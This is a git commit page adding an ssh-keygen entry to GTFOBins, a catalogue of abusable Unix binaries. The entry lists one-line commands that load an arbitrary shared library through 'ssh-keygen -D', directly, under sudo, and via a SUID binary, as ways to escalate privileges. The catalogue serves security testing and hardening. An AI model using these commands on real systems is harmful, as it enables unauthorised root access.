1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 16:26:01 +02:00

Add ssh-keygen

This commit is contained in:
joaogmauricio 2021-03-05 09:12:09 +01:00 committed by GitHub
parent af562d63cb
commit 2db67eefb9
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

12
_gtfobins/ssh-keygen.md Normal file
View File

@ -0,0 +1,12 @@
---
functions:
library-load:
- description: |
code: ssh-keygen -D ./lib.so
sudo:
- description: |
code: sudo ssh-keygen -D ./lib.so
suid:
- description: |
code: ./ssh-keygen -D ./lib.so
---